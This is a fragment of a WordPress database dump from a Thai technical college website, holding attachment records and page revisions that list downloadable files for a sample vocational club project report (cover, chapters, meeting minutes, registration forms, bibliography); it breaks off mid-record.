(2581, 3, '2018-05-21 16:22:51', '2018-05-21 09:22:51', '', '14 ขออนุญาตประชาสัมพันธ์', '', 'inherit', 'closed', 'closed', '', '14-%e0%b8%82%e0%b8%ad%e0%b8%ad%e0%b8%99%e0%b8%b8%e0%b8%8d%e0%b8%b2%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c', '', '', '2018-05-21 16:22:51', '2018-05-21 09:22:51', '', 2558, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/14-ขออนุญาตประชาสัมพันธ์.docx', 0, 'attachment', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 0),
(2582, 3, '2018-05-21 16:22:53', '2018-05-21 09:22:53', '', '14.1 สถานีวิทยุ R-radio 101.00 MHz R 2', '', 'inherit', 'closed', 'closed', '', '14-1-%e0%b8%aa%e0%b8%96%e0%b8%b2%e0%b8%99%e0%b8%b5%e0%b8%a7%e0%b8%b4%e0%b8%97%e0%b8%a2%e0%b8%b8-r-radio-101-00-mhz-r-2', '', '', '2018-05-21 16:22:53', '2018-05-21 09:22:53', '', 2558, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/14.1-สถานีวิทยุ-R-radio-101.00-MHz-R-2.docx', 0, 'attachment', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 0),
(2583, 3, '2018-05-21 16:22:55', '2018-05-21 09:22:55', '', '14.2 การเชิญเข้าร่วมโครงการรณรงค์ปลูกป่า', '', 'inherit', 'closed', 'closed', '', '14-2-%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b9%80%e0%b8%8a%e0%b8%b4%e0%b8%8d%e0%b9%80%e0%b8%82%e0%b9%89%e0%b8%b2%e0%b8%a3%e0%b9%88%e0%b8%a7%e0%b8%a1%e0%b9%82%e0%b8%84%e0%b8%a3%e0%b8%87%e0%b8%81%e0%b8%b2', '', '', '2018-05-21 16:22:55', '2018-05-21 09:22:55', '', 2558, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/14.2-การเชิญเข้าร่วมโครงการรณรงค์ปลูกป่า.docx', 0, 'attachment', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 0),
(2584, 3, '2018-05-21 16:23:03', '2018-05-21 09:23:03', '', '14.3 การเชิญเข้าร่วมโครงการ', '', 'inherit', 'closed', 'closed', '', '14-3-%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b9%80%e0%b8%8a%e0%b8%b4%e0%b8%8d%e0%b9%80%e0%b8%82%e0%b9%89%e0%b8%b2%e0%b8%a3%e0%b9%88%e0%b8%a7%e0%b8%a1%e0%b9%82%e0%b8%84%e0%b8%a3%e0%b8%87%e0%b8%81%e0%b8%b2', '', '', '2018-05-21 16:23:03', '2018-05-21 09:23:03', '', 2558, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/14.3-การเชิญเข้าร่วมโครงการ.docx', 0, 'attachment', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 0),
(2585, 3, '2018-05-21 16:23:06', '2018-05-21 09:23:06', '', '14.4 แจ้งข่าวสารผ่านสื่อออนไลน', '', 'inherit', 'closed', 'closed', '', '14-4-%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9c%e0%b9%88%e0%b8%b2%e0%b8%99%e0%b8%aa%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%ad%e0%b8%ad', '', '', '2018-05-21 16:23:06', '2018-05-21 09:23:06', '', 2558, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/14.4-แจ้งข่าวสารผ่านสื่อออนไลน.docx', 0, 'attachment', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 0),
(2586, 3, '2018-05-21 16:23:10', '2018-05-21 09:23:10', '', '15.กำหนดการโครงการ', '', 'inherit', 'closed', 'closed', '', '15-%e0%b8%81%e0%b8%b3%e0%b8%ab%e0%b8%99%e0%b8%94%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b9%82%e0%b8%84%e0%b8%a3%e0%b8%87%e0%b8%81%e0%b8%b2%e0%b8%a3', '', '', '2018-05-21 16:23:10', '2018-05-21 09:23:10', '', 2558, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/15.กำหนดการโครงการ.doc', 0, 'attachment', 'application/msword', 0),
(2587, 3, '2018-05-21 16:23:16', '2018-05-21 09:23:16', '', '16 แบบลงทะเบียนเข้าร่วมโครงการ', '', 'inherit', 'closed', 'closed', '', '16-%e0%b9%81%e0%b8%9a%e0%b8%9a%e0%b8%a5%e0%b8%87%e0%b8%97%e0%b8%b0%e0%b9%80%e0%b8%9a%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b9%80%e0%b8%82%e0%b9%89%e0%b8%b2%e0%b8%a3%e0%b9%88%e0%b8%a7%e0%b8%a1%e0%b9%82', '', '', '2018-05-21 16:23:16', '2018-05-21 09:23:16', '', 2558, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/16-แบบลงทะเบียนเข้าร่วมโครงการ.xlsx', 0, 'attachment', 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet', 0),
(2588, 3, '2018-05-21 16:23:21', '2018-05-21 09:23:21', '', '16.1 สรุปสมาชิกทั้งหมด', '', 'inherit', 'closed', 'closed', '', '16-1-%e0%b8%aa%e0%b8%a3%e0%b8%b8%e0%b8%9b%e0%b8%aa%e0%b8%a1%e0%b8%b2%e0%b8%8a%e0%b8%b4%e0%b8%81%e0%b8%97%e0%b8%b1%e0%b9%89%e0%b8%87%e0%b8%ab%e0%b8%a1%e0%b8%94', '', '', '2018-05-21 16:23:21', '2018-05-21 09:23:21', '', 2558, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/16.1-สรุปสมาชิกทั้งหมด.docx', 0, 'attachment', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 0),
(2589, 3, '2018-05-21 16:23:28', '2018-05-21 09:23:28', '', '16.2 ลงลายมือชื่ออาจารย์ที่เข้าร่วมโครงการ', '', 'inherit', 'closed', 'closed', '', '16-2-%e0%b8%a5%e0%b8%87%e0%b8%a5%e0%b8%b2%e0%b8%a2%e0%b8%a1%e0%b8%b7%e0%b8%ad%e0%b8%8a%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%ad%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%97%e0%b8%b5', '', '', '2018-05-21 16:23:28', '2018-05-21 09:23:28', '', 2558, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/16.2-ลงลายมือชื่ออาจารย์ที่เข้าร่วมโครงการ.doc', 0, 'attachment', 'application/msword', 0),
(2590, 3, '2018-05-21 16:23:33', '2018-05-21 09:23:33', '', '17 คำกล่าวของพิธีกร', '', 'inherit', 'closed', 'closed', '', '17-%e0%b8%84%e0%b8%b3%e0%b8%81%e0%b8%a5%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%82%e0%b8%ad%e0%b8%87%e0%b8%9e%e0%b8%b4%e0%b8%98%e0%b8%b5%e0%b8%81%e0%b8%a3', '', '', '2018-05-21 16:23:33', '2018-05-21 09:23:33', '', 2558, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/17-คำกล่าวของพิธีกร.doc', 0, 'attachment', 'application/msword', 0),
(2591, 3, '2018-05-21 16:23:38', '2018-05-21 09:23:38', '', '18 สรุปและรายงานผลการปฏิบัติงาน', '', 'inherit', 'closed', 'closed', '', '18-%e0%b8%aa%e0%b8%a3%e0%b8%b8%e0%b8%9b%e0%b9%81%e0%b8%a5%e0%b8%b0%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%9c%e0%b8%a5%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%8f%e0%b8%b4', '', '', '2018-05-21 16:23:38', '2018-05-21 09:23:38', '', 2558, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/18-สรุปและรายงานผลการปฏิบัติงาน.docx', 0, 'attachment', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 0),
(2592, 3, '2018-05-21 16:23:54', '2018-05-21 09:23:54', '', '19 ภาพที่ ๑ แสดงภาพบรรยากาศของโครงการ', '', 'inherit', 'closed', 'closed', '', '19-%e0%b8%a0%e0%b8%b2%e0%b8%9e%e0%b8%97%e0%b8%b5%e0%b9%88-%e0%b9%91-%e0%b9%81%e0%b8%aa%e0%b8%94%e0%b8%87%e0%b8%a0%e0%b8%b2%e0%b8%9e%e0%b8%9a%e0%b8%a3%e0%b8%a3%e0%b8%a2%e0%b8%b2%e0%b8%81%e0%b8%b2', '', '', '2018-05-21 16:23:54', '2018-05-21 09:23:54', '', 2558, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/19-ภาพที่-๑-แสดงภาพบรรยากาศของโครงการ.docx', 0, 'attachment', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 0),
(2593, 3, '2018-05-21 16:24:00', '2018-05-21 09:24:00', '', '19.1 ป้ายบนแผนกโครงการรณรงค์ปลูกป่า', '', 'inherit', 'closed', 'closed', '', '19-1-%e0%b8%9b%e0%b9%89%e0%b8%b2%e0%b8%a2%e0%b8%9a%e0%b8%99%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%81%e0%b9%82%e0%b8%84%e0%b8%a3%e0%b8%87%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%a3%e0%b8%93%e0%b8%a3%e0%b8%87', '', '', '2018-05-21 16:24:00', '2018-05-21 09:24:00', '', 2558, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/19.1-ป้ายบนแผนกโครงการรณรงค์ปลูกป่า.docx', 0, 'attachment', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 0),
(2594, 3, '2018-05-21 16:24:06', '2018-05-21 09:24:06', '', '19.2 แบบสอบถามโครงการ', '', 'inherit', 'closed', 'closed', '', '19-2-%e0%b9%81%e0%b8%9a%e0%b8%9a%e0%b8%aa%e0%b8%ad%e0%b8%9a%e0%b8%96%e0%b8%b2%e0%b8%a1%e0%b9%82%e0%b8%84%e0%b8%a3%e0%b8%87%e0%b8%81%e0%b8%b2%e0%b8%a3', '', '', '2018-05-21 16:24:06', '2018-05-21 09:24:06', '', 2558, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/19.2-แบบสอบถามโครงการ.docx', 0, 'attachment', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 0),
(2595, 3, '2018-05-21 16:24:41', '2018-05-21 09:24:41', '', '19.3 รูปโครงการ', '', 'inherit', 'closed', 'closed', '', '19-3-%e0%b8%a3%e0%b8%b9%e0%b8%9b%e0%b9%82%e0%b8%84%e0%b8%a3%e0%b8%87%e0%b8%81%e0%b8%b2%e0%b8%a3', '', '', '2018-05-21 16:24:41', '2018-05-21 09:24:41', '', 2558, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/19.3-รูปโครงการ.doc', 0, 'attachment', 'application/msword', 0),
(2596, 3, '2018-05-21 16:24:45', '2018-05-21 09:24:45', '', '19.4 บรรณานุกรม', '', 'inherit', 'closed', 'closed', '', '19-4-%e0%b8%9a%e0%b8%a3%e0%b8%a3%e0%b8%93%e0%b8%b2%e0%b8%99%e0%b8%b8%e0%b8%81%e0%b8%a3%e0%b8%a1', '', '', '2018-05-21 16:24:45', '2018-05-21 09:24:45', '', 2558, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/19.4-บรรณานุกรม.docx', 0, 'attachment', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 0),
(2597, 3, '2018-05-21 16:24:49', '2018-05-21 09:24:49', '', '19.5 บรรณานุกรม (1)', '', 'inherit', 'closed', 'closed', '', '19-5-%e0%b8%9a%e0%b8%a3%e0%b8%a3%e0%b8%93%e0%b8%b2%e0%b8%99%e0%b8%b8%e0%b8%81%e0%b8%a3%e0%b8%a1-1', '', '', '2018-05-21 16:24:49', '2018-05-21 09:24:49', '', 2558, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/19.5-บรรณานุกรม-1.docx', 0, 'attachment', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 0),
(2598, 3, '2018-05-21 16:24:51', '2018-05-21 09:24:51', '', '20 คั่นหน้า', '', 'inherit', 'closed', 'closed', '', '20-%e0%b8%84%e0%b8%b1%e0%b9%88%e0%b8%99%e0%b8%ab%e0%b8%99%e0%b9%89%e0%b8%b2', '', '', '2018-05-21 16:24:51', '2018-05-21 09:24:51', '', 2558, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/20-คั่นหน้า.docx', 0, 'attachment', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 0),
(2599, 3, '2018-05-21 16:36:10', '2018-05-21 09:36:10', '<img class=\"aligncenter wp-image-2559 size-full\" src=\"/wp-content/uploads/2018/05/1-ปกโครงการ.jpg\" alt=\"\" width=\"2480\" height=\"3508\" />\r\n\r\n<span style=\"color: #0000ff;\">1 ปกโครงการ</span>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/2-บทคัดย่อ.docx\">2 บทคัดย่อ</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/2.1กิตติกรรมประกาศ.docx\">2.1 กิตติกรรมประกาศ</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/3-คำนำ.docx\">3 คำนำ</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/4.1-สารบัญ.docx\">4.1 สารบัญ</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/4.2-สารบัญตาราง.docx\">4.2 สารบัญตาราง</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/4.3-สารบัญภาพ.docx\">4.3 สารบัญภาพ</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/5.1-บทที่-1-โครงการ.doc\">5.1 บทที่ 1 โครงการ</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/5.2-บทที่2โครงการ.doc\">5.2 บทที่ 2 โครงการ</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/5.3-บทที่-3-โครงการ.doc\">5.3 บทที่ 3 โครงการ</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/5.4-บทที่-4-โครงการ.docx\">5.4 บทที่ 4 โครงการ</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/5.5-บทที่-5-โครงการ.docx\">5.5 บทที่ 5 โครงการ</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/6-รายงานผลโครงการ.docx\">6 รายงานผลโครงการ</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/7-คำสั่งองค์การ.docx\">7 คำสั่งองค์การ</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/7.1-ประกาศองค์การ-แก้ไข.docx\">7.1 ประกาศองค์การ</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/8-ขอเชิญประชุมคณะกรรมการดำเนินงาน.docx\">8 ขอเชิญประชุมคณะกรรมการดำเนินงาน</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/8.1-ขออนุญาตจัดประชุม.docx\">8.1 ขออนุญาตจัดประชุม</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/9-บันทึกการประชุม.docx\">9 บันทึกการประชุม</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/10-รายงานการประชุม.docx\">10 รายงานการประชุม</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/11-ลงลายมือชื่อการประชุม.docx\">11 ลงลายมือชื่อการประชุม</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/12-รายงานการประชุมเขียนแล้ว.docx\">12 รายงานการประชุมเขียนแล้ว</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/13-ขอความอนุเคราะห์ประชาสัมพันธ์-R-1.docx\">13 ขอความอนุเคราะห์ประชาสัมพันธ์ R 1</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/14-ขออนุญาตประชาสัมพันธ์.docx\">14 ขออนุญาตประชาสัมพันธ์</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/14.1-สถานีวิทยุ-R-radio-101.00-MHz-R-2.docx\">14.1 สถานีวิทยุ R-radio 101.00 MHz R 2</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/14.2-การเชิญเข้าร่วมโครงการรณรงค์ปลูกป่า.docx\">14.2 การเชิญเข้าร่วมโครงการรณรงค์ปลูกป่า</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/14.3-การเชิญเข้าร่วมโครงการ.docx\">14.3 การเชิญเข้าร่วมโครงการ</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/14.4-แจ้งข่าวสารผ่านสื่อออนไลน.docx\">14.4 แจ้งข่าวสารผ่านสื่อออนไลน</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/15.กำหนดการโครงการ.doc\">15 กำหนดการโครงการ</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/16-แบบลงทะเบียนเข้าร่วมโครงการ.xlsx\">16 แบบลงทะเบียนเข้าร่วมโครงการ</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/16.1-สรุปสมาชิกทั้งหมด.docx\">16.1 สรุปสมาชิกทั้งหมด</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/16.2-ลงลายมือชื่ออาจารย์ที่เข้าร่วมโครงการ.doc\">16.2 ลงลายมือชื่ออาจารย์ที่เข้าร่วมโครงการ</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/17-คำกล่าวของพิธีกร.doc\">17 คำกล่าวของพิธีกร</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/18-สรุปและรายงานผลการปฏิบัติงาน.docx\">18 สรุปและรายงานผลการปฏิบัติงาน</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/19-ภาพที่-๑-แสดงภาพบรรยากาศของโครงการ.docx\">19 ภาพที่ ๑ แสดงภาพบรรยากาศของโครงการ</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/19.1-ป้ายบนแผนกโครงการรณรงค์ปลูกป่า.docx\">19.1 ป้ายบนแผนกโครงการรณรงค์ปลูกป่า</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/19.2-แบบสอบถามโครงการ.docx\">19.2 แบบสอบถามโครงการ</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/19.3-รูปโครงการ.doc\">19.3 รูปโครงการ</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/19.4-บรรณานุกรม.docx\">19.4 บรรณานุกรม</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/19.5-บรรณานุกรม-1.docx\">19.5 บรรณานุกรม</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/20-คั่นหน้า.docx\">20 คั่นหน้า</a>\r\n\r\n \r\n\r\n ', 'ตัวอย่างรูปเล่มรายงานชมรมวิชาชีพ', '', 'inherit', 'closed', 'closed', '', '2558-revision-v1', '', '', '2018-05-21 16:36:10', '2018-05-21 09:36:10', '', 2558, 'http://www.technicrayong.ac.th/2558-revision-v1/', 0, 'revision', '', 0),
(2601, 3, '2018-05-21 16:38:01', '2018-05-21 09:38:01', '<img class=\"aligncenter wp-image-2559 size-full\" src=\"/wp-content/uploads/2018/05/1-ปกโครงการ.jpg\" alt=\"\" width=\"2480\" height=\"3508\" />\r\n<h3><span style=\"color: #0000ff;\">1 ปกโครงการ</span></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/05/2-บทคัดย่อ.docx\">2 บทคัดย่อ</a></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/05/2.1กิตติกรรมประกาศ.docx\">2.1 กิตติกรรมประกาศ</a></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/05/3-คำนำ.docx\">3 คำนำ</a></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/05/4.1-สารบัญ.docx\">4.1 สารบัญ</a></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/05/4.2-สารบัญตาราง.docx\">4.2 สารบัญตาราง</a></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/05/4.3-สารบัญภาพ.docx\">4.3 สารบัญภาพ</a></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/05/5.1-บทที่-1-โครงการ.doc\">5.1 บทที่ 1 โครงการ</a></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/05/5.2-บทที่2โครงการ.doc\">5.2 บทที่ 2 โครงการ</a></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/05/5.3-บทที่-3-โครงการ.doc\">5.3 บทที่ 3 โครงการ</a></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/05/5.4-บทที่-4-โครงการ.docx\">5.4 บทที่ 4 โครงการ</a></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/05/5.5-บทที่-5-โครงการ.docx\">5.5 บทที่ 5 โครงการ</a></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/05/6-รายงานผลโครงการ.docx\">6 รายงานผลโครงการ</a></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/05/7-คำสั่งองค์การ.docx\">7 คำสั่งองค์การ</a></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/05/7.1-ประกาศองค์การ-แก้ไข.docx\">7.1 ประกาศองค์การ</a></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/05/8-ขอเชิญประชุมคณะกรรมการดำเนินงาน.docx\">8 ขอเชิญประชุมคณะกรรมการดำเนินงาน</a></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/05/8.1-ขออนุญาตจัดประชุม.docx\">8.1 ขออนุญาตจัดประชุม</a></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/05/9-บันทึกการประชุม.docx\">9 บันทึกการประชุม</a></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/05/10-รายงานการประชุม.docx\">10 รายงานการประชุม</a></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/05/11-ลงลายมือชื่อการประชุม.docx\">11 ลงลายมือชื่อการประชุม</a></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/05/12-รายงานการประชุมเขียนแล้ว.docx\">12 รายงานการประชุมเขียนแล้ว</a></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/05/13-ขอความอนุเคราะห์ประชาสัมพันธ์-R-1.docx\">13 ขอความอนุเคราะห์ประชาสัมพันธ์ R 1</a></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/05/14-ขออนุญาตประชาสัมพันธ์.docx\">14 ขออนุญาตประชาสัมพันธ์</a></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/05/14.1-สถานีวิทยุ-R-radio-101.00-MHz-R-2.docx\">14.1 สถานีวิทยุ R-radio 101.00 MHz R 2</a></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/05/14.2-การเชิญเข้าร่วมโครงการรณรงค์ปลูกป่า.docx\">14.2 การเชิญเข้าร่วมโครงการรณรงค์ปลูกป่า</a></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/05/14.3-การเชิญเข้าร่วมโครงการ.docx\">14.3 การเชิญเข้าร่วมโครงการ</a></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/05/14.4-แจ้งข่าวสารผ่านสื่อออนไลน.docx\">14.4 แจ้งข่าวสารผ่านสื่อออนไลน</a></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/05/15.กำหนดการโครงการ.doc\">15 กำหนดการโครงการ</a></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/05/16-แบบลงทะเบียนเข้าร่วมโครงการ.xlsx\">16 แบบลงทะเบียนเข้าร่วมโครงการ</a></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/05/16.1-สรุปสมาชิกทั้งหมด.docx\">16.1 สรุปสมาชิกทั้งหมด</a></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/05/16.2-ลงลายมือชื่ออาจารย์ที่เข้าร่วมโครงการ.doc\">16.2 ลงลายมือชื่ออาจารย์ที่เข้าร่วมโครงการ</a></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/05/17-คำกล่าวของพิธีกร.doc\">17 คำกล่าวของพิธีกร</a></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/05/18-สรุปและรายงานผลการปฏิบัติงาน.docx\">18 สรุปและรายงานผลการปฏิบัติงาน</a></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/05/19-ภาพที่-๑-แสดงภาพบรรยากาศของโครงการ.docx\">19 ภาพที่ ๑ แสดงภาพบรรยากาศของโครงการ</a></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/05/19.1-ป้ายบนแผนกโครงการรณรงค์ปลูกป่า.docx\">19.1 ป้ายบนแผนกโครงการรณรงค์ปลูกป่า</a></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/05/19.2-แบบสอบถามโครงการ.docx\">19.2 แบบสอบถามโครงการ</a></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/05/19.3-รูปโครงการ.doc\">19.3 รูปโครงการ</a></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/05/19.4-บรรณานุกรม.docx\">19.4 บรรณานุกรม</a></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/05/19.5-บรรณานุกรม-1.docx\">19.5 บรรณานุกรม</a></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/05/20-คั่นหน้า.docx\">20 คั่นหน้า</a></h3>\r\n<h3></h3>\r\n ', 'ตัวอย่างรูปเล่มรายงานชมรมวิชาชีพ', '', 'inherit', 'closed', 'closed', '', '2558-revision-v1', '', '', '2018-05-21 16:38:01', '2018-05-21 09:38:01', '', 2558, 'http://www.technicrayong.ac.th/2558-revision-v1/', 0, 'revision', '', 0),
(2603, 3, '2018-05-21 16:38:46', '2018-05-21 09:38:46', '<h3><span style=\"color: #0000ff;\">ตัวอย่างรูปเล่มรายงานชมรมวิชาชีพ</span> <a href=\"http://www.technicrayong.ac.th/ตัวอย่างรูปเล่มรายงานช\"><span style=\"color: #ff0000;\">>>>คลิกที่นี่<<<</span></a></h3>', 'องค์การนักวิชาชีพในอนาคตแห่งประเทศไทย', '', 'inherit', 'closed', 'closed', '', '2555-revision-v1', '', '', '2018-05-21 16:38:46', '2018-05-21 09:38:46', '', 2555, 'http://www.technicrayong.ac.th/2555-revision-v1/', 0, 'revision', '', 0),
(2604, 3, '2018-05-21 16:39:11', '2018-05-21 09:39:11', '<img class=\"aligncenter wp-image-2559 size-full\" src=\"/wp-content/uploads/2018/05/1-ปกโครงการ.jpg\" alt=\"\" width=\"2480\" height=\"3508\" />\r\n<h3><span style=\"color: #0000ff;\">1 ปกโครงการ</span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/2-บทคัดย่อ.docx\">2 บทคัดย่อ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/2.1กิตติกรรมประกาศ.docx\">2.1 กิตติกรรมประกาศ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/3-คำนำ.docx\">3 คำนำ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/4.1-สารบัญ.docx\">4.1 สารบัญ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/4.2-สารบัญตาราง.docx\">4.2 สารบัญตาราง</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/4.3-สารบัญภาพ.docx\">4.3 สารบัญภาพ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/5.1-บทที่-1-โครงการ.doc\">5.1 บทที่ 1 โครงการ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/5.2-บทที่2โครงการ.doc\">5.2 บทที่ 2 โครงการ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/5.3-บทที่-3-โครงการ.doc\">5.3 บทที่ 3 โครงการ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/5.4-บทที่-4-โครงการ.docx\">5.4 บทที่ 4 โครงการ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/5.5-บทที่-5-โครงการ.docx\">5.5 บทที่ 5 โครงการ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/6-รายงานผลโครงการ.docx\">6 รายงานผลโครงการ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/7-คำสั่งองค์การ.docx\">7 คำสั่งองค์การ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/7.1-ประกาศองค์การ-แก้ไข.docx\">7.1 